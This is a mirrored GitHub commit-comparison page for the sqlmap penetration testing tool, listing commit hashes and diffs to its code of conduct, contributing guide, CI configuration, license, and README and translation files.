mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 20:51:31 +00:00
Compare commits
407 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
af89137f2c | ||
|
|
1f9bf587b5 | ||
|
|
f0e4c20004 | ||
|
|
cef416559a | ||
|
|
ce47b6c76e | ||
|
|
39108bc100 | ||
|
|
f63ceaa0c1 | ||
|
|
1e60378fb2 | ||
|
|
22c7bc54b4 | ||
|
|
5f1bae86b0 | ||
|
|
a0cbf6991d | ||
|
|
9f2bc00426 | ||
|
|
6bb486c1bf | ||
|
|
741ce9e3f0 | ||
|
|
a479655097 | ||
|
|
4846d85ccd | ||
|
|
3c439c3929 | ||
|
|
5cc36a5736 | ||
|
|
29dcdd3bef | ||
|
|
53eadb0af8 | ||
|
|
7b705b94e3 | ||
|
|
558484644a | ||
|
|
e84142b6a9 | ||
|
|
b44551230e | ||
|
|
4ecf6eee05 | ||
|
|
57be1856a6 | ||
|
|
a424e4ab59 | ||
|
|
4660b816d5 | ||
|
|
f92e1ebc40 | ||
|
|
48cd0421a6 | ||
|
|
4b4f728d8e | ||
|
|
e8336ecfe1 | ||
|
|
38ea0686a8 | ||
|
|
73b0de67b5 | ||
|
|
fae97b3937 | ||
|
|
c0947846f4 | ||
|
|
5e2d0bd320 | ||
|
|
4badb54607 | ||
|
|
29aaec8925 | ||
|
|
27ff5d6fec | ||
|
|
72ff6e24ff | ||
|
|
717c451b8c | ||
|
|
e5968cae31 | ||
|
|
2b55ae3e2a | ||
|
|
8f4488d608 | ||
|
|
f1254fef4b | ||
|
|
ccda26a567 | ||
|
|
099110bc1f | ||
|
|
0265b3fcfa | ||
|
|
961d2b24d1 | ||
|
|
53578bcb7c | ||
|
|
756f02fb0e | ||
|
|
17c170e1f8 | ||
|
|
220c1be162 | ||
|
|
6b06332896 | ||
|
|
c268663bd9 | ||
|
|
a97fd1dede | ||
|
|
b93284530e | ||
|
|
cf4c263a4e | ||
|
|
23777143b6 | ||
|
|
9b397f00be | ||
|
|
d47c16e196 | ||
|
|
e0c7b5c63c | ||
|
|
091c8ab2dd | ||
|
|
86303bde55 | ||
|
|
c89f119e1a | ||
|
|
25369ca591 | ||
|
|
a399b65033 | ||
|
|
ed37ae1562 | ||
|
|
5381d4d5be | ||
|
|
c1825b2651 | ||
|
|
e7d448c56c | ||
|
|
694b5bb5c0 | ||
|
|
eb498e6c03 | ||
|
|
ca8b589d43 | ||
|
|
18706f7fad | ||
|
|
80f3b9a711 | ||
|
|
6b3f01bfeb | ||
|
|
42042fb5de | ||
|
|
2abc7fc588 | ||
|
|
1ecc326714 | ||
|
|
d2d829abf5 | ||
|
|
43d9ac2bd4 | ||
|
|
d8196cf7e6 | ||
|
|
42b0edca6d | ||
|
|
331ccc5549 | ||
|
|
d5627fdf1b | ||
|
|
7b3a17bfe7 | ||
|
|
4a8f01c9dc | ||
|
|
13bf3e649a | ||
|
|
9a63fb1055 | ||
|
|
3544793961 | ||
|
|
7a8add0412 | ||
|
|
1d382bcb4d | ||
|
|
ec6ad3ce68 | ||
|
|
73d8952f2a | ||
|
|
2a810fb796 | ||
|
|
8f7a7bed20 | ||
|
|
36b0ece2ad | ||
|
|
7d8fbab035 | ||
|
|
5580db0045 | ||
|
|
3fde205cd4 | ||
|
|
1822cc05f6 | ||
|
|
509bb41b06 | ||
|
|
8ca3287df4 | ||
|
|
60767de2eb | ||
|
|
29e683fb5b | ||
|
|
148d1c9ff9 | ||
|
|
a8cb14ed4a | ||
|
|
c634f0b0d6 | ||
|
|
8605c49911 | ||
|
|
44f6951dfe | ||
|
|
b5b32c951c | ||
|
|
a9c3b59cff | ||
|
|
4528cb014d | ||
|
|
2c5f976993 | ||
|
|
4f2669a45a | ||
|
|
641838ed73 | ||
|
|
2a681b7bd6 | ||
|
|
7f3f1dcdee | ||
|
|
4147f44e63 | ||
|
|
2cc6214227 | ||
|
|
8a90512354 | ||
|
|
ae8699f258 | ||
|
|
cdb1e79370 | ||
|
|
f0677d88b7 | ||
|
|
16cd13d7db | ||
|
|
c7329cb03b | ||
|
|
45fb5ab4a5 | ||
|
|
241f7321de | ||
|
|
c6c1ac02bb | ||
|
|
f287ff3767 | ||
|
|
7d5a0ed2dc | ||
|
|
4fc7fc6447 | ||
|
|
880d709bfd | ||
|
|
0ddc7bae66 | ||
|
|
305b2aa9b5 | ||
|
|
e63b97afd6 | ||
|
|
c378b6691c | ||
|
|
ee431cd83b | ||
|
|
e088fe08ec | ||
|
|
74de40b9c5 | ||
|
|
6c2b7cff80 | ||
|
|
a6809e03ef | ||
|
|
ac68eed65d | ||
|
|
a27f21cb1d | ||
|
|
01fb07f68c | ||
|
|
d7f2445814 | ||
|
|
6875c40a06 | ||
|
|
4cd859012a | ||
|
|
5feb4c3ccd | ||
|
|
3c5e9e7559 | ||
|
|
909a3456e3 | ||
|
|
fa4c1c5251 | ||
|
|
8166a4eeb8 | ||
|
|
ae2b02952f | ||
|
|
1d9c11b1c1 | ||
|
|
99894dc3c1 | ||
|
|
0c4b6c9978 | ||
|
|
cd88caa0e7 | ||
|
|
c024233f88 | ||
|
|
5380e8174b | ||
|
|
4cefff7e98 | ||
|
|
11b52c85e1 | ||
|
|
24cefeaee2 | ||
|
|
9ad32864ec | ||
|
|
190e8ae5fa | ||
|
|
43044d8512 | ||
|
|
881b49afd2 | ||
|
|
93b425809e | ||
|
|
4f2f31af67 | ||
|
|
f95d0c831b | ||
|
|
76905e8728 | ||
|
|
8d6cc4ae2c | ||
|
|
a369f61207 | ||
|
|
34d2fb1c8f | ||
|
|
ec6de40a8d | ||
|
|
6402d2ec57 | ||
|
|
b25f2bfa45 | ||
|
|
9df16f3eb2 | ||
|
|
d99151ce5a | ||
|
|
93859fdc42 | ||
|
|
b595b883d1 | ||
|
|
67f8c22702 | ||
|
|
24cc6e92e9 | ||
|
|
f38596a5b3 | ||
|
|
5ff54bf9c6 | ||
|
|
8e8ae52288 | ||
|
|
e2cc9569e5 | ||
|
|
365fa5a52a | ||
|
|
faaae2b647 | ||
|
|
d813d24c48 | ||
|
|
e347d90ec5 | ||
|
|
56a4e507e8 | ||
|
|
5b99180ffe | ||
|
|
061c8da36b | ||
|
|
a16663f9a1 | ||
|
|
62fc2e1e17 | ||
|
|
ef8b2d793f | ||
|
|
aebfb7d597 | ||
|
|
9e75bb7f68 | ||
|
|
be7711bcdb | ||
|
|
10fd004dec | ||
|
|
0a8bc52910 | ||
|
|
31fa7f6c94 | ||
|
|
30f8c30d6a | ||
|
|
fd8bbaff9f | ||
|
|
02661c166d | ||
|
|
4bf20066ec | ||
|
|
c5730ee88d | ||
|
|
a7bf4f47e6 | ||
|
|
fc06d4d9cb | ||
|
|
4b9613e362 | ||
|
|
cea9d1c75e | ||
|
|
94c170d392 | ||
|
|
18626656ec | ||
|
|
e5ab678db0 | ||
|
|
a59198d1e4 | ||
|
|
f6738adc04 | ||
|
|
e0dee9418d | ||
|
|
439f8247b6 | ||
|
|
165b275fd7 | ||
|
|
811bd0e89f | ||
|
|
47bbcf90ea | ||
|
|
8a122401aa | ||
|
|
ddc453e3da | ||
|
|
764d114b3c | ||
|
|
6e9fe27fa0 | ||
|
|
132fb0d18d | ||
|
|
84b7a26bfd | ||
|
|
66c1f72a16 | ||
|
|
b6584c8043 | ||
|
|
78ac42c168 | ||
|
|
009f13742e | ||
|
|
1df0461893 | ||
|
|
bc1fbc5a58 | ||
|
|
cad6cfe6a6 | ||
|
|
7ade3aa1ad | ||
|
|
0b24a80387 | ||
|
|
574074e171 | ||
|
|
f2f7994ac6 | ||
|
|
42ddfd8f50 | ||
|
|
2d4391dc36 | ||
|
|
5326df1071 | ||
|
|
9a2cdd4b59 | ||
|
|
acd764fee8 | ||
|
|
310a82933c | ||
|
|
b1662f54c8 | ||
|
|
8cef17b583 | ||
|
|
cb1b5d30fd | ||
|
|
5d6b972002 | ||
|
|
57044262d9 | ||
|
|
8d19c3bd46 | ||
|
|
b9efdb2999 | ||
|
|
dde1178100 | ||
|
|
638dbf255a | ||
|
|
a90b5f7fb3 | ||
|
|
06ca058300 | ||
|
|
370884d07a | ||
|
|
91bffe988b | ||
|
|
220dffbcfa | ||
|
|
9fab2c9764 | ||
|
|
7244e8e4e2 | ||
|
|
e7268ffb4d | ||
|
|
7c5b051d60 | ||
|
|
5899fd5ef2 | ||
|
|
f60727a891 | ||
|
|
792ed52ab5 | ||
|
|
132a72c9bd | ||
|
|
8735a49f63 | ||
|
|
b9e2e8b74d | ||
|
|
b23626db70 | ||
|
|
33d8ce8923 | ||
|
|
72f7caa23b | ||
|
|
284bdac72c | ||
|
|
7d6a3c4034 | ||
|
|
02274f6db1 | ||
|
|
bf8b2eb21e | ||
|
|
1436333960 | ||
|
|
d7677f322d | ||
|
|
ab641e9242 | ||
|
|
ec83837342 | ||
|
|
2333903b68 | ||
|
|
d54ec88648 | ||
|
|
f210d66dff | ||
|
|
a651c8a637 | ||
|
|
b608c21dff | ||
|
|
88df293a1a | ||
|
|
323f1285b6 | ||
|
|
26b81f58bb | ||
|
|
839070d6ee | ||
|
|
28ee12c4d2 | ||
|
|
bc61a6828c | ||
|
|
e9380627e1 | ||
|
|
e80e841b25 | ||
|
|
4102d87521 | ||
|
|
67b470245e | ||
|
|
d148694a4b | ||
|
|
9404b63a42 | ||
|
|
58b87e4b6b | ||
|
|
5c35aff22a | ||
|
|
18d78a34cc | ||
|
|
f9e80adcef | ||
|
|
e5f96102af | ||
|
|
d9bf33ea1d | ||
|
|
0d1ea50785 | ||
|
|
cc37b12d37 | ||
|
|
c671acb62e | ||
|
|
cdd0e6f0ac | ||
|
|
ce8d0befd0 | ||
|
|
14676bdffb | ||
|
|
01d24cbb42 | ||
|
|
9c3c9a9315 | ||
|
|
66d37112d1 | ||
|
|
6bf84151e4 | ||
|
|
22907d5085 | ||
|
|
b1a898662d | ||
|
|
496075ef20 | ||
|
|
ac2359f8df | ||
|
|
ff5bdbefe8 | ||
|
|
190cf4b14d | ||
|
|
9df514cf41 | ||
|
|
f7cde3099b | ||
|
|
668d86df9f | ||
|
|
915d4bf900 | ||
|
|
8d7796f41c | ||
|
|
5497a6e58d | ||
|
|
9ae713bcec | ||
|
|
7c874350d2 | ||
|
|
311444a4ac | ||
|
|
4e611133c6 | ||
|
|
5f25a77eab | ||
|
|
ae3c013054 | ||
|
|
7b0f1fd7fc | ||
|
|
1f60dfc835 | ||
|
|
94579aa80d | ||
|
|
0f4d202db4 | ||
|
|
a1dd7363d4 | ||
|
|
12b331170b | ||
|
|
3ca4b7c0a9 | ||
|
|
f9de8a8b5d | ||
|
|
9ba5feba03 | ||
|
|
8c6b761044 | ||
|
|
a2d465aa4a | ||
|
|
d80f108365 | ||
|
|
91d918096f | ||
|
|
936b1c1874 | ||
|
|
c768fe4617 | ||
|
|
b7db28a89b | ||
|
|
94a337b2e3 | ||
|
|
df135a5b0c | ||
|
|
d8caf7818d | ||
|
|
a450271e6d | ||
|
|
339dc7ce37 | ||
|
|
5df7abb0ee | ||
|
|
1f5f2aff0b | ||
|
|
8c88a095fb | ||
|
|
09ddb3bd8b | ||
|
|
d2af0c7a1f | ||
|
|
3fbe2f645a | ||
|
|
f1c102a020 | ||
|
|
834ea2d0d8 | ||
|
|
ae972de8fc | ||
|
|
62519eed04 | ||
|
|
222fd856fa | ||
|
|
db94d24db1 | ||
|
|
116c1c8b5c | ||
|
|
afc2a42383 | ||
|
|
44664dd7d6 | ||
|
|
35ba94b3a9 | ||
|
|
24c261d630 | ||
|
|
6a8ea0557c | ||
|
|
721bf4d243 | ||
|
|
e02ce4eb1f | ||
|
|
2f8e8a5f62 | ||
|
|
7de63a7efb | ||
|
|
12f802c70f | ||
|
|
96ffb4b911 | ||
|
|
93cb879e5d | ||
|
|
f67f26cebd | ||
|
|
942ac7733a | ||
|
|
2496db9d96 | ||
|
|
a3249019d9 | ||
|
|
96f80879ff | ||
|
|
96b9950f96 | ||
|
|
30ea219228 | ||
|
|
7c41bc57e7 | ||
|
|
e609bd04ad | ||
|
|
511f2a6d12 | ||
|
|
415ce05a2f | ||
|
|
06deda3223 | ||
|
|
d4170f11f0 | ||
|
|
cb2258fea4 | ||
|
|
c871cedae4 | ||
|
|
3e4130c5e6 | ||
|
|
a6c04a59cb | ||
|
|
53eb44304f | ||
|
|
400339a884 | ||
|
|
8b0c50f25d | ||
|
|
e42b63f51c | ||
|
|
b8f88a079a | ||
|
|
a761e1d165 | ||
|
|
5b6926ae05 | ||
|
|
e862da6d4e | ||
|
|
1ac0704c09 | ||
|
|
b6b51bea9d | ||
|
|
672abe8416 |
46
.github/CODE_OF_CONDUCT.md
vendored
Normal file
46
.github/CODE_OF_CONDUCT.md
vendored
Normal file
@@ -0,0 +1,46 @@
|
|||||||
|
# Contributor Covenant Code of Conduct
|
||||||
|
|
||||||
|
## Our Pledge
|
||||||
|
|
||||||
|
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
|
||||||
|
|
||||||
|
## Our Standards
|
||||||
|
|
||||||
|
Examples of behavior that contributes to creating a positive environment include:
|
||||||
|
|
||||||
|
* Using welcoming and inclusive language
|
||||||
|
* Being respectful of differing viewpoints and experiences
|
||||||
|
* Gracefully accepting constructive criticism
|
||||||
|
* Focusing on what is best for the community
|
||||||
|
* Showing empathy towards other community members
|
||||||
|
|
||||||
|
Examples of unacceptable behavior by participants include:
|
||||||
|
|
||||||
|
* The use of sexualized language or imagery and unwelcome sexual attention or advances
|
||||||
|
* Trolling, insulting/derogatory comments, and personal or political attacks
|
||||||
|
* Public or private harassment
|
||||||
|
* Publishing others' private information, such as a physical or electronic address, without explicit permission
|
||||||
|
* Other conduct which could reasonably be considered inappropriate in a professional setting
|
||||||
|
|
||||||
|
## Our Responsibilities
|
||||||
|
|
||||||
|
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
|
||||||
|
|
||||||
|
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
|
||||||
|
|
||||||
|
## Scope
|
||||||
|
|
||||||
|
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
|
||||||
|
|
||||||
|
## Enforcement
|
||||||
|
|
||||||
|
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
|
||||||
|
|
||||||
|
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
|
||||||
|
|
||||||
|
## Attribution
|
||||||
|
|
||||||
|
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
|
||||||
|
|
||||||
|
[homepage]: http://contributor-covenant.org
|
||||||
|
[version]: http://contributor-covenant.org/version/1/4/
|
||||||
@@ -24,7 +24,6 @@ Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md)
|
|||||||
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
|
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
|
||||||
|
|
||||||
* Each patch should make one logical change.
|
* Each patch should make one logical change.
|
||||||
* Wrap code to 76 columns when possible.
|
|
||||||
* Avoid tabbing, use four blank spaces instead.
|
* Avoid tabbing, use four blank spaces instead.
|
||||||
* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
|
* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
|
||||||
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
|
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
|
||||||
@@ -1,4 +1,7 @@
|
|||||||
language: python
|
language: python
|
||||||
|
sudo: false
|
||||||
|
git:
|
||||||
|
depth: 1
|
||||||
python:
|
python:
|
||||||
- "2.6"
|
- "2.6"
|
||||||
- "2.7"
|
- "2.7"
|
||||||
|
|||||||
@@ -1,7 +1,7 @@
|
|||||||
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
COPYING -- Describes the terms under which sqlmap is distributed. A copy
|
||||||
of the GNU General Public License (GPL) is appended to this file.
|
of the GNU General Public License (GPL) is appended to this file.
|
||||||
|
|
||||||
sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
sqlmap is (C) 2006-2018 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
|
||||||
|
|
||||||
This program is free software; you may redistribute and/or modify it under
|
This program is free software; you may redistribute and/or modify it under
|
||||||
the terms of the GNU General Public License as published by the Free
|
the terms of the GNU General Public License as published by the Free
|
||||||
@@ -31,6 +31,9 @@ interpretation of derived works with some common examples. Our
|
|||||||
interpretation applies only to sqlmap - we do not speak for other people's
|
interpretation applies only to sqlmap - we do not speak for other people's
|
||||||
GPL works.
|
GPL works.
|
||||||
|
|
||||||
|
This license does not apply to the third-party components. More details can
|
||||||
|
be found inside the file 'doc/THIRD-PARTY.md'.
|
||||||
|
|
||||||
If you have any questions about the GPL licensing restrictions on using
|
If you have any questions about the GPL licensing restrictions on using
|
||||||
sqlmap in non-GPL works, we would be happy to help. As mentioned above,
|
sqlmap in non-GPL works, we would be happy to help. As mentioned above,
|
||||||
we also offer alternative license to integrate sqlmap into proprietary
|
we also offer alternative license to integrate sqlmap into proprietary
|
||||||
@@ -343,29 +346,3 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
|
|||||||
POSSIBILITY OF SUCH DAMAGES.
|
POSSIBILITY OF SUCH DAMAGES.
|
||||||
|
|
||||||
END OF TERMS AND CONDITIONS
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
****************************************************************************
|
|
||||||
|
|
||||||
This license does not apply to the following components:
|
|
||||||
|
|
||||||
* The Ansistrm library located under thirdparty/ansistrm/.
|
|
||||||
* The Beautiful Soup library located under thirdparty/beautifulsoup/.
|
|
||||||
* The Bottle library located under thirdparty/bottle/.
|
|
||||||
* The Chardet library located under thirdparty/chardet/.
|
|
||||||
* The ClientForm library located under thirdparty/clientform/.
|
|
||||||
* The Colorama library located under thirdparty/colorama/.
|
|
||||||
* The Fcrypt library located under thirdparty/fcrypt/.
|
|
||||||
* The Gprof2dot library located under thirdparty/gprof2dot/.
|
|
||||||
* The KeepAlive library located under thirdparty/keepalive/.
|
|
||||||
* The Magic library located under thirdparty/magic/.
|
|
||||||
* The MultipartPost library located under thirdparty/multipartpost/.
|
|
||||||
* The Odict library located under thirdparty/odict/.
|
|
||||||
* The Oset library located under thirdparty/oset/.
|
|
||||||
* The PrettyPrint library located under thirdparty/prettyprint/.
|
|
||||||
* The PyDes library located under thirdparty/pydes/.
|
|
||||||
* The SocksiPy library located under thirdparty/socks/.
|
|
||||||
* The Termcolor library located under thirdparty/termcolor/.
|
|
||||||
* The XDot library located under thirdparty/xdot/.
|
|
||||||
* The icmpsh tool located under extra/icmpsh/.
|
|
||||||
|
|
||||||
Details for the above packages can be found in the THIRD-PARTY.md file.
|
|
||||||
@@ -1,9 +1,11 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
|
||||||
|
|
||||||
|
**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).**
|
||||||
|
|
||||||
Screenshots
|
Screenshots
|
||||||
----
|
----
|
||||||
|
|
||||||
@@ -60,6 +62,8 @@ Translations
|
|||||||
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
|
||||||
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
||||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||||
|
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
||||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||||
|
* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
|
||||||
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
|
||||||
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
|
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
|
sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,6 @@
|
|||||||
# sqlmap
|
# sqlmap
|
||||||
|
|
||||||
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
|
**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
|
||||||
|
|
||||||
@@ -13,7 +13,7 @@ Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/w
|
|||||||
Installation
|
Installation
|
||||||
----
|
----
|
||||||
|
|
||||||
Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
Vous pouvez télécharger le fichier "tarball" le plus récent en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger l'archive zip la plus récente [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):
|
De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
@@ -21,7 +21,7 @@ De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sql
|
|||||||
|
|
||||||
sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)
|
sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)
|
||||||
|
|
||||||
Usage
|
Utilisation
|
||||||
----
|
----
|
||||||
|
|
||||||
Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:
|
Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:
|
||||||
@@ -33,7 +33,7 @@ Pour afficher une liste complète des options et des commutateurs (switches), ta
|
|||||||
python sqlmap.py -hh
|
python sqlmap.py -hh
|
||||||
|
|
||||||
Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
|
Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
|
||||||
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||||
|
|
||||||
Liens
|
Liens
|
||||||
----
|
----
|
||||||
@@ -41,7 +41,7 @@ Liens
|
|||||||
* Page d'acceuil: http://sqlmap.org
|
* Page d'acceuil: http://sqlmap.org
|
||||||
* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
